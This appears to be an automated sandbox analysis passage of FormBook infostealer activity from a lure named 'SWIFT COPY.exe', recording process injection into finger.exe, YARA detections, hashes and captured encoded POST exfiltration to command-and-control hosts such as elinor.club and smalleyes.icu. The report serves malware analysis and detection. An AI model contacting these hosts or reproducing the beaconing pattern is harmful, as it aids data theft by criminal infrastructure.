                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Ascii: Ir=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXONGKWhkubNSiRGxXW/5JsUnoGbwT+JdKBw==
Dec 19, 2024 08:41:18.788994074 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                            Server: nginx
                                                                                            Date: Thu, 19 Dec 2024 07:41:18 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Location: http://elinor.club/1ne4/
                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49831 | 194.58.112.174 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe

Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:41:20.147219896 CET | 823 | OUT | POST /1ne4/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.elinor.club
                                                                                            Origin: http://www.elinor.club
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 219
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.elinor.club/1ne4/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Ascii: Ir=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N9ICrnAugaNyDMVfO5XVlQOIIkuZShW0VEvry6n5URm3RZp8a+y6TLl1ECyJKqz+9gIFzqrGV9Aga7LNU7Ga32pB3H8KUMpeEsdI5mWnBRds8M73cYsHUhfHMj0fxgCVI29Zg8NHOYe+UDbbc5nzKgDayRnCSU/VczH9DTN4eJ1YvQ=
Dec 19, 2024 08:41:21.459768057 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                            Server: nginx
                                                                                            Date: Thu, 19 Dec 2024 07:41:21 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Location: http://elinor.club/1ne4/
                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49836 | 194.58.112.174 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:41:22.853152990 CET | 10905 | OUT | POST /1ne4/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.elinor.club
                                                                                            Origin: http://www.elinor.club
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 10299
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.elinor.club/1ne4/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: Ir= [TRUNCATED]
Dec 19, 2024 08:41:24.143435001 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                            Server: nginx
                                                                                            Date: Thu, 19 Dec 2024 07:41:23 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Location: http://elinor.club/1ne4/
                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49845 | 194.58.112.174 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:41:25.516135931 CET | 541 | OUT | GET /1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5jUfoqKY7Fz8p0/9FqW//8AiMTO0G3RJpL4=&M8Gl=KPotmx2p0n HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Host: www.elinor.club
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Dec 19, 2024 08:41:26.834894896 CET | 481 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                            Server: nginx
                                                                                            Date: Thu, 19 Dec 2024 07:41:26 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Location: http://elinor.club/1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5jUfoqKY7Fz8p0/9FqW//8AiMTO0G3RJpL4=&M8Gl=KPotmx2p0n
                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49863 | 134.122.191.187 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:41:32.949417114 CET | 809 | OUT | POST /s6zh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.smalleyes.icu
                                                                                            Origin: http://www.smalleyes.icu
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Ascii: Ir=6nn7X8LHMfZVIW/SkuM7i6PmFdW1N35AjPNqcaSfaFW8S3hrSduSvx/ETntUqSb5MCBrp4xflVbpN5vG6DFVO/9LEDmFt7UO5k46AOqO+IFhNiSmk5kIEQXL8RemuKC0RnKlW/jlcik5GrxYtEZ4PVxEjbzLlPCquUmIQPWSjs7vhIqJ2pS3y3kF7UvKi1Hpvg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49869 | 134.122.191.187 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:41:35.608900070 CET | 829 | OUT | POST /s6zh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.smalleyes.icu
                                                                                            Origin: http://www.smalleyes.icu
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 219
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                            Data Ascii: Ir=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa3C8SWRrTcuSsx/EcHtRlyb2MCFNp59flV/pN4fG6wdKUP9JCDmHjbUO5k46AOug+OthNRKm2sQLHQXIrhemqKCwRnKHW6fLchM5GrBYt2h7GVwPu7yK1/muiWb+Tcz3odWXkOnTnYzgg3A2mTm+v26g0nMn+G+cEUJ4T3/iBaqZqkU=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49875 | 134.122.191.187 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:41:38.284279108 CET | 10911 | OUT | POST /s6zh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Host: www.smalleyes.icu
                                                                                            Origin: http://www.smalleyes.icu
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Connection: close
                                                                                            Content-Length: 10299
                                                                                            Cache-Control: no-cache
                                                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: Ir= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49884 | 134.122.191.187 | 80 | 6016 | C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 08:41:40.944854021 CET | 543 | OUT | GET /s6zh/?Ir=3lPbUJ/4EMFnMU367dk2ybPqIMylLyFhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMKMrA2+vlNwKuHc+NKCv2NtQORSHn8saFjw=&M8Gl=KPotmx2p0n HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US
                                                                                            Host: www.smalleyes.icu
                                                                                            Connection: close
                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36



                                                                                            Target ID:0
                                                                                            Start time:02:39:46
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Users\user\Desktop\SWIFT COPY.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\SWIFT COPY.exe"
                                                                                            Imagebase:0x750000
                                                                                            File size:986'112 bytes
                                                                                            MD5 hash:180A3E0827818592194C3A46DD8E9DD7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:02:40:02
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Users\user\Desktop\SWIFT COPY.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\SWIFT COPY.exe"
                                                                                            Imagebase:0x750000
                                                                                            File size:986'112 bytes
                                                                                            MD5 hash:180A3E0827818592194C3A46DD8E9DD7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:02:40:28
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe"
                                                                                            Imagebase:0xe60000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:7
                                                                                            Start time:02:40:30
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\finger.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                                                            Imagebase:0x3c0000
                                                                                            File size:13'824 bytes
                                                                                            MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:02:40:44
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe"
                                                                                            Imagebase:0xe60000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:9
                                                                                            Start time:02:40:56
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                            Imagebase:0x7ff6bf500000
                                                                                            File size:676'768 bytes
                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true


                                                                                              Execution Graph

                                                                                              Execution Coverage:13.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:1.1%
                                                                                              Total number of Nodes:281
                                                                                              Total number of Limit Nodes:17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (otq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                                              • API String ID: 0-1537292367
                                                                                              • Opcode ID: 8e4a168586e6de5c94960c3fb0be49bda9d4fd9f56a24bfc3a72a313e6732f57
                                                                                              • Instruction ID: 3fb0a2db4d7419a319b2ef7559cbed0e38d61b591d9e40e1c2012e3b8ebc60da
                                                                                              • Opcode Fuzzy Hash: 8e4a168586e6de5c94960c3fb0be49bda9d4fd9f56a24bfc3a72a313e6732f57
                                                                                              • Instruction Fuzzy Hash: 11634074A44219CFCB28DF68C884A9DB7B2FF89310F158599E919AB761CB34ED81CF50

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893516515.0000000009D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9d40000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hxq$Hxq$Hxq$Hxq$Hxq
                                                                                              • API String ID: 0-615405233
                                                                                              • Opcode ID: e89ffbfac4062101a1dba54554198ced8e80fb5b134ca7828837d6b7e8a75bee
                                                                                              • Instruction ID: 5b33e952994731cdf978dc6dc58cd0ad3dff715ce435c3c4d5f6bbff3ee4c7cf
                                                                                              • Opcode Fuzzy Hash: e89ffbfac4062101a1dba54554198ced8e80fb5b134ca7828837d6b7e8a75bee
                                                                                              • Instruction Fuzzy Hash: 40329F70A102588FDB58DFB9C8507AEBBF2BF88300F14856AD449AB795DB349C45CFA1

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ry$ry$ry
                                                                                              • API String ID: 0-128149707
                                                                                              • Opcode ID: 95e4b84ecfddd7efa3b2e70f56df14870d1d915d2f7f6de892680f5e72884da2
                                                                                              • Instruction ID: a8c2c6909c59af679086080ecd6488e0318991734b6031b5750a870da68ae00b
                                                                                              • Opcode Fuzzy Hash: 95e4b84ecfddd7efa3b2e70f56df14870d1d915d2f7f6de892680f5e72884da2
                                                                                              • Instruction Fuzzy Hash: DEE19174D1420ADFDB04CFA5C4854AEFBB2FF89340B14D969D422AB259D738A982CFD4

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ry$ry$ry
                                                                                              • API String ID: 0-128149707
                                                                                              • Opcode ID: d5ec9d92a16aa22050f4a27e60ce0e2dc7857c3c7c378c61a6e856d9a7052c91
                                                                                              • Instruction ID: 44420a9e87499b365d134092105badd857cb3b6a9446fae3ddcda6fedf2b4b21
                                                                                              • Opcode Fuzzy Hash: d5ec9d92a16aa22050f4a27e60ce0e2dc7857c3c7c378c61a6e856d9a7052c91
                                                                                              • Instruction Fuzzy Hash: F0E1A374D1420ADFCB04CFA5C4854AEFBB2FF89340B15D969D422AB259D738A982CFD4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ry$ry$ry
                                                                                              • API String ID: 0-128149707
                                                                                              • Opcode ID: 5e8bcbb900c4b5dfd6b5878499976038121e9b475a62dd366fea00dff023e863
                                                                                              • Instruction ID: 8f4b7fd1c77b9dc83dfd06c247536db062b9e62d75e3d6626e8eed98b279ce11
                                                                                              • Opcode Fuzzy Hash: 5e8bcbb900c4b5dfd6b5878499976038121e9b475a62dd366fea00dff023e863
                                                                                              • Instruction Fuzzy Hash: 91C14C74D1520ADFCB14CF95C4858AEFBB2FF89340B10D969D426AB219D734A982CF94

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Tetq$Tetq$z^I
                                                                                              • API String ID: 0-2759915012
                                                                                              • Opcode ID: 97ae65e25326317ae75d236178f08ae382534cfeb897882379595a257c8b3d03
                                                                                              • Instruction ID: 8869fda6d137d557cd8888f72002ca179894a10a5280496c828396e6ee76fdfc
                                                                                              • Opcode Fuzzy Hash: 97ae65e25326317ae75d236178f08ae382534cfeb897882379595a257c8b3d03
                                                                                              • Instruction Fuzzy Hash: 59B11674E05259CFCB08CFA9C99499EFBF2FF89300F14942AD415AB268D7399941CF94

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Tetq$Tetq$z^I
                                                                                              • API String ID: 0-2759915012
                                                                                              • Opcode ID: 30b813691759d00844bb36cfd3c1cc9bd279d38584269ed7d6d1d0d58ac10591
                                                                                              • Instruction ID: 4fbf7e59b81af54635c7341515da128d32f7cc2a18c238f1591cbe37d28e9617
                                                                                              • Opcode Fuzzy Hash: 30b813691759d00844bb36cfd3c1cc9bd279d38584269ed7d6d1d0d58ac10591
                                                                                              • Instruction Fuzzy Hash: 0A91C3B4E142198FCB08CFAAC59459EFBB2FF89300F24942AD415BB354D7359945CFA4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TuA$UC;"
                                                                                              • API String ID: 0-2071649361
                                                                                              • Opcode ID: 0a6c68760727a7bf6657d995193d509be9c600448756eda4dc36126c68d2dee9
                                                                                              • Instruction ID: e070a9567197f1b47381ee2808c0a5094ea02735c02328da3941a7c574578d2e
                                                                                              • Opcode Fuzzy Hash: 0a6c68760727a7bf6657d995193d509be9c600448756eda4dc36126c68d2dee9
                                                                                              • Instruction Fuzzy Hash: C291E774D05209EFCB08CFAAD98159EFBF2FF89350F10A52AE415A7264D7349942CF90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TuA$UC;"
                                                                                              • API String ID: 0-2071649361
                                                                                              • Opcode ID: cb4b8461853e39876971833bf8f092b132d04158249ff00c73d22504302193cc
                                                                                              • Instruction ID: dbc5457112420909d0a628582195f619a836c003b123a19db792cd96fa25202d
                                                                                              • Opcode Fuzzy Hash: cb4b8461853e39876971833bf8f092b132d04158249ff00c73d22504302193cc
                                                                                              • Instruction Fuzzy Hash: 5691D575D05209AFCB08CFAAE9C159EFBF2FF89350F10A42AE415A7264D7349942CF90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5=6
                                                                                              • API String ID: 0-2897083178
                                                                                              • Opcode ID: 5fc32711835b8b8184c92cb5f844e0ec436d004c4bceb2ba1280a08106c48456
                                                                                              • Instruction ID: 90ee9281bb9cf199919a57112f27d9d82fe9c65bb00d68ede7bf3a55bc664a0c
                                                                                              • Opcode Fuzzy Hash: 5fc32711835b8b8184c92cb5f844e0ec436d004c4bceb2ba1280a08106c48456
                                                                                              • Instruction Fuzzy Hash: 7B714574E0521A9FCB48CFE6D9454AEFBF2FF89340F10992AD416E7254D7389A018FA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5=6
                                                                                              • API String ID: 0-2897083178
                                                                                              • Opcode ID: 19ae730dd04957da4fdcc9d5bd09a24858db7cc1a6fe2b1ba1ecfdf898ed8cec
                                                                                              • Instruction ID: fdb5770c90fc0ac96900a81603b88d0cbcc35b777cf869c2d904b8d6c89336c8
                                                                                              • Opcode Fuzzy Hash: 19ae730dd04957da4fdcc9d5bd09a24858db7cc1a6fe2b1ba1ecfdf898ed8cec
                                                                                              • Instruction Fuzzy Hash: CB612574E0521A9FCB48CFE6D9454AEFBF2FF89340F10992AD416E7254D7389A018FA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -2m
                                                                                              • API String ID: 0-2686427999
                                                                                              • Opcode ID: 1fbab02a853681d5a0989c28071c8db95988105bc5f76b92defebb7deced5095
                                                                                              • Instruction ID: b113fd9959d07d22a53cbc50c9c39018960da677d5a016d3469e454dc621dcce
                                                                                              • Opcode Fuzzy Hash: 1fbab02a853681d5a0989c28071c8db95988105bc5f76b92defebb7deced5095
                                                                                              • Instruction Fuzzy Hash: EB513D74E05219CFCB08CFAAC8406AEFBF2FF89341F24D46AD41AA7254D7349941CBA5
